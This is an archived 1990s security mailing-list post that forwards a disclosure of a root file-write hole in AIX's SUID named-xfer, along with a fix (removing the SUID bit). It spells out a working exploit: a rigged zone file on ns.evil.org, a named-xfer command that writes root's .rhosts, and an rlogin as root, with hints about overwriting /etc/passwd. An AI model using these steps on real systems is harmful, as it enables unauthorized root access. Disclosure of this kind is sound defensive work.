named-xfer hole on AIX (fwd)

[amonk () GNUTEC COM (Kyle Amon)]

Aleph,

I thought I posted this to the list almost two years ago, but I never saw
it show up and it hasn't turned up in any of the usual archives of such
things.  I didn't bother to save a copy so I just figured, oh well.  It
turns out a friend that I sent it to saved a copy, so here it is again
(below) for the sake of posterity.

- Kyle

Kyle Amon                     email: amonk () gnutec com
                              url:   http://www.gnutec.com/~amonk
KeyID 1024/26DD13D9
Fingerprint = 7D 86 D1 AE 4B E9 91 6A  4B BC B5 B4 12 F0 D3 1A

            ________  _______    ________  ________            __    __
           / ______/ / ____  \  / ______/ / ______/           /  \  / /
          / /_____  / /____/ / / /_____  / /_____            / /\ \/ /
         / ______/ / __  ___/ / ______/ / ______/           /_/  \__/
        / /       / /  \ \   / /_____  / /_____            ________
       /_/       /_/    \_\ /_______/ /_______/           / ____  /
      __   __   _______  __    __  ______        __      / /___/ /  __
     / / _/_/  / _____/ / /   / / /_  __/ /\    / /     /_______/  /  \
    / /_/_/   / /____  / /   / /   / /   /  \  / /     __    __    |  |
   / _  /    / _____/ / /  _/_/   / /   / /\ \/ /     / /_  / /     \/
  / / \ \   / /____   \ \_/_/  __/ /_  / /  \  /     ( (/_\/ /
 /_/   \_\ /______/    \__/   /_____/ /_/    \/       \_/ \_/       ()

 A man denied legal counsel, held without bail or trial, is a political
   prisoner in any country, especially the United States of America!

                     http://www.kevinmitnick.com
                      http://www.2600.com/kevin

   Petition to Microsoft Corporation for Open Source Consumer Windows!
        http://www.linuxresources.com/linuxreview/petition.html

---------- Forwarded message ----------
Date: Thu, 18 Feb 1999 22:08:12 -0500 (EST)
From: Cherie Earnest <cherie () gnutec com>
To: Kyle Amon <amonk () gnutec com>
Subject: named-xfer hole on AIX (fwd)

---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 07:58:48 -0500 (EST)
From: amonk () raleigh ibm com
To: cherie () gnutec com
Subject: named-xfer hole on AIX (fwd)

Friends, Romans, Geeks,

I don't know if anyone's noticed this before, but if so I ain't heard
about it so here goes nuthin... :-)

On AIX, named-xfer has the following permissions...

-r-sr-xr--   1 root     system     32578 Feb 18 1997  /usr/sbin/named-xfer

which of course means that only root and members of the system group have
execute permission but that (since the SUID bit is set) it executes as
root even when run by non-root members of the system group.  So, although
one would have to already be a member of the system group (or manage to
obtain such status) in order to exploit the problem described here, it's
still a rather significant problem.  And its much worse than the old
sendmail -C problem which was still exploitable in AIX up until very
recently when one was a member of the system group.  The big difference
here being that sendmail -C only let one read files they shouldn't have
been able to read whereas this problem lets one write them :-).

The problem is that named-xfer writes it's resulting zone file (when using
the -f option) without (or at least before) relinquishing it's root
privilege (and I doubt it ever relinquishes it since it doesn't really
need it in the first place).

So, for example, if one were to set up a zone at ns.evil.org in the
following manner...

putting this in the named.boot file...

primary    +       db.hack

and giving db.hack contents as follows...

@                IN        SOA      evil.org. nsa.evil.org. (
                                    666        ; Serial
                                    10800      ; Refresh
                                    3600       ; Retry
                                    3600000    ; Expire
                                    86400 )    ; Minimum TTL

then run a command like this on some victim AIX machine...

named-xfer -z + -f /.rhosts ns.evil.org

they will put this file in root's home directory... :-)

-rw-r--r--   1 root     system       155 Jan  8 03:52 .rhosts

with contents of this... :-)

; zone '+'   last serial 0
; from 10.10.10.10   at Thu Jan  8 03:52:19 1998
$ORIGIN .
+               IN      SOA     evil.org. nsa.evil.org. (
                666 10800 3600 3600000 86400 )

All they need do then is create a user like this (anywhere)...

IN:!:666:1::/home/IN:/bin/ksh

and login or su to it then rlogin to victim AIX machine as root! :-)

Isn't that special?

So now we have reason number 9999 not to run the BSD "r" commands on
our machines.  And as I'm sure you all know, this is but one semi-creative
use for this.  I'm sure the gentle reader will be able to come up with
a handfull of others... and the not so gentle reader will immediately see
possibilities for overwriting the /etc/passwd file or the kernel. :-(

Now, lest you think me a true cad, the simple fix is that the damn thing
doesn't need it's SUID bit set in order to work (why it comes with it on,
I couldn't imagine).  So, check yer boxes boys n girls and dump this here
bit from this here program. :-)

Best Regards,

Kyle

P.S.  I only verified this on AIX 4.1.5 and 4.2.1 but it is likely a
      pervasive problem.

Kyle Amon                     email: amonk () raleigh ibm com
Unix Systems Administrator    phone: (203) 486-3290
Security Specialist           pager: 1-800-759-8888 PIN 1616512
IBM Global Services                  or 1616512 () skymail com
                              email: amonk () gnutec com
                              url:   http://www.gnutec.com/kyle
KeyID 1024/173D96C9
Fingerprint = 90 4F 0B D4 2D 37 E7 61  1A 31 7B F2 72 04 66 1A

Windows 95:  A 32-bit patch for a 16-bit GUI shell running on top of an
             8-bit operating system written for a 4-bit processor by a
             2-bit company who cannot stand 1 bit of competition.